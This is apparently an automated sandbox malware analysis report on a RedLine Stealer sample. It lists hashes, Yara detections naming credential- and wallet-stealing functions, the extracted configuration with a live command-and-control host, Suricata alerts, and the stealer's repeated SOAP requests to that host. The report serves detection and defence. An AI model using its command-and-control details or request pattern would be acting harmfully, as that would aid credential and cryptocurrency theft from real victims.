Edit tour

Windows Analysis Report
bac4j0DRRb.exe

Overview

General Information

Sample name:	bac4j0DRRb.exe renamed because original name is a hash value
Original sample name:	AD9E28142AB51F364542C7DAC2D73A8C.exe
Analysis ID:	1538231
MD5:	ad9e28142ab51f364542c7dac2d73a8c
SHA1:	8bd52e4e93b44a347d05c3c94c397354894088ae
SHA256:	a9ec84d22acda7f438810bae0831bc151e6784f2005c896d687ab295ef4a7fd5
Tags:	exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected RedLine Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Detected potential crypto function

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

bac4j0DRRb.exe (PID: 4028 cmdline: "C:\Users\user\Desktop\bac4j0DRRb.exe" MD5: AD9E28142AB51F364542C7DAC2D73A8C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["ierinapu.xyz:80"], "Bot Id": "@apexbeatsjuggin"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
bac4j0DRRb.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
bac4j0DRRb.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
bac4j0DRRb.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
bac4j0DRRb.exe	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x16478:$a2: https://ipinfo.io/ip%appdata%\ 0x16b98:$a3: Software\Valve\SteamLogin Data 0x124d3:$a4: get_ScannedWallets 0x11477:$a5: get_ScanTelegram 0x1214a:$a6: get_ScanGeckoBrowsersPaths 0x10106:$a7: <Processes>k__BackingField 0xe0bf:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xfa3a:$a9: <ScanFTP>k__BackingField
bac4j0DRRb.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xf58c:$u7: RunPE 0x1294d:$u8: DownloadAndEx 0x16f80:$pat14: , CommandLine: 0x11f9f:$v2_1: ListOfProcesses 0xf764:$v2_2: get_ScanVPN 0xf807:$v2_2: get_ScanFTP 0x104bf:$v2_2: get_ScanDiscord 0x1145b:$v2_2: get_ScanSteam 0x11477:$v2_2: get_ScanTelegram 0x1152c:$v2_2: get_ScanScreen 0x12112:$v2_2: get_ScanChromeBrowsersPaths 0x1214a:$v2_2: get_ScanGeckoBrowsersPaths 0x12421:$v2_2: get_ScanBrowsers 0x124d3:$v2_2: get_ScannedWallets 0x124f9:$v2_2: get_ScanWallets 0x12519:$v2_3: GetArguments 0x1567f:$v2_3: GetArguments 0x10d2b:$v2_4: VerifyUpdate 0x156cd:$v2_4: VerifyUpdate 0x127e1:$v2_5: VerifyScanRequest 0x15698:$v2_5: VerifyScanRequest

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.2027367969.0000000000452000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.2027367969.0000000000452000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000000.2027367969.0000000000452000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x16078:$a2: https://ipinfo.io/ip%appdata%\ 0x16798:$a3: Software\Valve\SteamLogin Data 0x120d3:$a4: get_ScannedWallets 0x11077:$a5: get_ScanTelegram 0x11d4a:$a6: get_ScanGeckoBrowsersPaths 0xfd06:$a7: <Processes>k__BackingField 0xdcbf:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xf63a:$a9: <ScanFTP>k__BackingField
Process Memory Space: bac4j0DRRb.exe PID: 4028	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: bac4j0DRRb.exe PID: 4028	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: bac4j0DRRb.exe PID: 4028	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x18444:$a4: get_ScannedWallets 0x1742d:$a5: get_ScanTelegram 0x180c0:$a6: get_ScanGeckoBrowsersPaths 0x16103:$a7: <Processes>k__BackingField 0x140f0:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x15a37:$a9: <ScanFTP>k__BackingField
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.bac4j0DRRb.exe.450000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.bac4j0DRRb.exe.450000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.bac4j0DRRb.exe.450000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.0.bac4j0DRRb.exe.450000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x16478:$a2: https://ipinfo.io/ip%appdata%\ 0x16b98:$a3: Software\Valve\SteamLogin Data 0x124d3:$a4: get_ScannedWallets 0x11477:$a5: get_ScanTelegram 0x1214a:$a6: get_ScanGeckoBrowsersPaths 0x10106:$a7: <Processes>k__BackingField 0xe0bf:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xfa3a:$a9: <ScanFTP>k__BackingField
0.0.bac4j0DRRb.exe.450000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xf58c:$u7: RunPE 0x1294d:$u8: DownloadAndEx 0x16f80:$pat14: , CommandLine: 0x11f9f:$v2_1: ListOfProcesses 0xf764:$v2_2: get_ScanVPN 0xf807:$v2_2: get_ScanFTP 0x104bf:$v2_2: get_ScanDiscord 0x1145b:$v2_2: get_ScanSteam 0x11477:$v2_2: get_ScanTelegram 0x1152c:$v2_2: get_ScanScreen 0x12112:$v2_2: get_ScanChromeBrowsersPaths 0x1214a:$v2_2: get_ScanGeckoBrowsersPaths 0x12421:$v2_2: get_ScanBrowsers 0x124d3:$v2_2: get_ScannedWallets 0x124f9:$v2_2: get_ScanWallets 0x12519:$v2_3: GetArguments 0x1567f:$v2_3: GetArguments 0x10d2b:$v2_4: VerifyUpdate 0x156cd:$v2_4: VerifyUpdate 0x127e1:$v2_5: VerifyScanRequest 0x15698:$v2_5: VerifyScanRequest

Suricata Signatures

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-20T21:02:17.139662+0200	2018141	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.5	49708	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-20T21:02:17.139662+0200	2037771	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.5	49708	TCP

ET MALWARE RedLine - GetArguments Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-20T21:02:05.829393+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49704	18.141.10.107	80	TCP
2024-10-20T21:02:08.742100+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49705	18.141.10.107	80	TCP
2024-10-20T21:02:11.392076+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49706	18.141.10.107	80	TCP
2024-10-20T21:02:14.540121+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49707	18.141.10.107	80	TCP
2024-10-20T21:02:17.133861+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49708	18.141.10.107	80	TCP
2024-10-20T21:02:19.918328+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49713	18.141.10.107	80	TCP
2024-10-20T21:02:22.456520+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49727	18.141.10.107	80	TCP
2024-10-20T21:02:25.067847+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49742	18.141.10.107	80	TCP
2024-10-20T21:02:27.613147+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49752	18.141.10.107	80	TCP
2024-10-20T21:02:30.197493+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49763	18.141.10.107	80	TCP
2024-10-20T21:02:32.792047+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49775	18.141.10.107	80	TCP
2024-10-20T21:02:35.364874+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49787	18.141.10.107	80	TCP
2024-10-20T21:02:38.422893+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49797	18.141.10.107	80	TCP
2024-10-20T21:02:40.994757+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49811	18.141.10.107	80	TCP
2024-10-20T21:02:43.552295+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49823	18.141.10.107	80	TCP
2024-10-20T21:02:46.136200+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49834	18.141.10.107	80	TCP
2024-10-20T21:02:49.164825+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49847	18.141.10.107	80	TCP
2024-10-20T21:02:51.747237+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49860	18.141.10.107	80	TCP
2024-10-20T21:02:54.307507+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49872	18.141.10.107	80	TCP
2024-10-20T21:02:56.905258+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49883	18.141.10.107	80	TCP
2024-10-20T21:02:59.466963+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49897	18.141.10.107	80	TCP
2024-10-20T21:03:02.050809+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49912	18.141.10.107	80	TCP
2024-10-20T21:03:05.062590+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49923	18.141.10.107	80	TCP
2024-10-20T21:03:07.601149+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49938	18.141.10.107	80	TCP
2024-10-20T21:03:10.161871+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49950	18.141.10.107	80	TCP
2024-10-20T21:03:12.946777+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49961	18.141.10.107	80	TCP
2024-10-20T21:03:15.499426+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49974	18.141.10.107	80	TCP
2024-10-20T21:03:18.051436+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49987	18.141.10.107	80	TCP
2024-10-20T21:03:20.609574+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	49999	18.141.10.107	80	TCP
2024-10-20T21:03:23.165100+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50007	18.141.10.107	80	TCP
2024-10-20T21:03:25.819073+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50008	18.141.10.107	80	TCP
2024-10-20T21:03:28.382549+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50009	18.141.10.107	80	TCP
2024-10-20T21:03:30.947354+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50010	18.141.10.107	80	TCP
2024-10-20T21:03:33.463359+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50011	18.141.10.107	80	TCP
2024-10-20T21:03:35.962807+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50012	18.141.10.107	80	TCP
2024-10-20T21:03:38.421418+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50013	18.141.10.107	80	TCP
2024-10-20T21:03:40.843150+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50014	18.141.10.107	80	TCP
2024-10-20T21:03:43.250308+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50015	18.141.10.107	80	TCP
2024-10-20T21:03:45.617806+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50016	18.141.10.107	80	TCP
2024-10-20T21:03:47.952099+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50017	18.141.10.107	80	TCP
2024-10-20T21:03:50.270234+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50018	18.141.10.107	80	TCP
2024-10-20T21:03:52.569756+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50019	18.141.10.107	80	TCP
2024-10-20T21:03:55.110951+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50020	18.141.10.107	80	TCP
2024-10-20T21:03:57.550012+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50021	18.141.10.107	80	TCP
2024-10-20T21:03:59.765805+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50022	18.141.10.107	80	TCP
2024-10-20T21:04:01.976012+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50023	18.141.10.107	80	TCP
2024-10-20T21:04:04.159964+0200	2034361	1	Malware Command and Control Activity Detected	192.168.2.5	50024	18.141.10.107	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: bac4j0DRRb.exe

Avira: detected

Found malware configuration

Source: bac4j0DRRb.exe

Malware Configuration Extractor: RedLine {"C2 url": ["ierinapu.xyz:80"], "Bot Id": "@apexbeatsjuggin"}

Multi AV Scanner detection for submitted file

Source: bac4j0DRRb.exe

ReversingLabs: Detection: 81%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: bac4j0DRRb.exe

Joe Sandbox ML: detected

Source: bac4j0DRRb.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: bac4j0DRRb.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdb source: bac4j0DRRb.exe, 00000000.00000002.3289204149.000000000097A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: bac4j0DRRb.exe, 00000000.00000002.3289204149.000000000097A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: bac4j0DRRb.exe, 00000000.00000002.3289204149.0000000000942000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: bac4j0DRRb.exe, 00000000.00000002.3289204149.000000000097A000.00000004.00000020.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49704 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49707 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49706 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49708 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49713 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49705 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49742 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49752 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49727 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49775 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49763 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49787 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49823 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49811 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49834 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49797 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49847 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49860 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49872 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49897 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49883 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49912 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49923 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49938 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49961 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49999 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50007 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49950 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49974 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49987 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50011 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50016 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50017 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50020 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50010 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50021 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50012 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50018 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50009 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50022 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50023 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50019 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50014 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50024 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50015 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50008 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:50013 -> 18.141.10.107:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: ierinapu.xyz:80

Performs DNS queries to domains with low reputation

Source:

DNS query: ierinapu.xyz

Yara detected Generic Downloader

Source: Yara match	File source: bac4j0DRRb.exe, type: SAMPLE
Source: Yara match	File source: 0.0.bac4j0DRRb.exe.450000.0.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ierinapu.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
